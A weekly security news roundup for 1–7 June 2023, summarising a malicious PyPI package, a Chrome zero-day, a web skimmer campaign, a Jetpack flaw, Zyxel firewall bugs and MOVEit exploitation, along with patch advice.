06/01/2023-06/07/2023 Malicious PyPI Packages, Google Issues Patch for New Chrome Vulnerability, Urgent WordPress Update And More

1. Malicious PyPI Packages Using Compiled Python Code to Bypass Detection

Researchers have uncovered a new attack on the Python Package Index (PyPI) repository that evades detection by security tools. This attack is believed to be the first of its kind to utilize compiled Python code, specifically Python bytecode (PYC) files, for direct execution.The targeted package, fshec2, was removed from the third-party software registry following responsible disclosure. PYC files are generated by the Python interpreter during program execution and contain compiled code. The malicious package, according to a software supply chain security firm, consists of three files: init.py, main.py, and full.pyc.

The main.py file, imported by init.py, is responsible for loading the Python compiled module from full.pyc using the importlib package. Reverse-engineering the PYC file reveals its intent to gather user information, hostnames, directory listings, and execute commands received from a hardcoded server (13.51.44[.]246).

2. Zero-Day Alert: Google Issues Patch for New Chrome Vulnerability – Update Now!

Google has released security updates for its Chrome web browser to address a high-severity vulnerability (CVE-2023-3079) actively being exploited in the wild. The flaw is a type confusion bug in the V8 JavaScript engine. The exploit, which could potentially lead to heap corruption, can be triggered by a crafted HTML page. Google has not provided specific details about the attacks but has confirmed the existence of an exploit. This marks the third zero-day vulnerability addressed by Google in Chrome this year. Users are advised to update to version 114.0.5735.110 (Windows) or 114.0.5735.106 (macOS and Linux) to mitigate potential threats. Additionally, users of Chromium-based browsers like Microsoft Edge, Brave, Opera, and Vivaldi should apply the fixes as soon as they are available.

3. Magento, WooCommerce, WordPress, and Shopify Exploited in Web Skimmer Attack

Researchers have discovered an ongoing Magecart-style web skimmer campaign designed to steal personally identifiable information and credit card data from e-commerce websites. What sets this campaign apart is that the compromised sites are being used as “makeshift” command-and-control servers, allowing the attackers to distribute malicious code without detection. Akamai, a web security company, found victims across North America, Latin America, and Europe, putting the personal data of thousands of site visitors at risk. The attackers employ various evasion techniques, such as obfuscation with Base64 and masking the attack to resemble popular third-party services like Google Analytics. By hacking into vulnerable legitimate sites, the attackers leverage the reputation of these domains. The attacks have been ongoing for almost a month and target e-commerce platforms like Magento, WooCommerce, WordPress, and Shopify. The skimmer code, disguised as third-party services, intercepts and exfiltrates data to an actor-controlled server using obfuscation and encoded strings to avoid detection.

4. Urgent WordPress Update Fixes Critical Flaw in Jetpack Plugin on Million of Sites

WordPress has issued an automatic update to address a critical vulnerability in the popular Jetpack plugin, which is installed on over five million sites. The vulnerability, discovered during an internal security audit, affects an API present in the plugin since version 2.0, released in November 2012. The flaw could potentially be exploited by authors on a site to manipulate any files in the WordPress installation. Jetpack has released 102 new versions to fix the bug. While there is no evidence of exploitation in the wild, it is not uncommon for vulnerabilities in widely used WordPress plugins to be targeted by malicious actors. This is not the first time Jetpack has faced severe security weaknesses, as previous incidents have prompted WordPress to enforce mandatory patch installations. Additionally, a security flaw in the Gravity Forms plugin has been revealed, allowing unauthenticated users to inject arbitrary PHP code. The issue has been resolved in the latest version of the plugin.

5. Zyxel Firewalls Under Attack! Urgent Patching Required

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added two recently disclosed vulnerabilities in Zyxel firewalls to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation. The buffer overflow vulnerabilities, known as CVE-2023-33009 and CVE-2023-33010, could lead to denial-of-service (DoS) attacks and remote code execution. Zyxel released patches for these security flaws on May 24, 2023. Affected devices include ATP, USG FLEX, USG FLEX50(W)/USG20(W)-VPN, VPN, and ZyWALL/USG. The specific details of the attacks are unknown, but this development follows the active exploitation of another Zyxel firewall flaw (CVE-2023-28771) by the Mirai botnet. Federal Civilian Executive Branch agencies have been instructed to address the vulnerabilities by June 26, 2023, to protect their networks. Zyxel has issued guidance advising customers to disable unnecessary services and ports to enhance security.

6. Microsoft: Lace Tempest Hackers Behind Active Exploitation of MOVEit Transfer App

Microsoft has attributed the active exploitation of a critical vulnerability in Progress Software MOVEit Transfer to the threat actor known as Lace Tempest. This threat actor, also known as Storm-0950, is associated with ransomware groups such as FIN11, TA505, and Evil Corp, and operates the Cl0p extortion site. The vulnerability in question, identified as CVE-2023-34362, allows remote attackers to execute arbitrary code by exploiting an SQL injection flaw in MOVEit Transfer. Microsoft’s Threat Intelligence team has observed the deployment of web shells with data exfiltration capabilities following exploitation. Approximately 3,000 exposed hosts utilizing MOVEit Transfer have been identified. The activity has been tracked by Mandiant as UNC4857, with connections to FIN11. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has included the vulnerability in its Known Exploited Vulnerabilities catalog and recommends applying vendor-provided patches by June 23, 2023.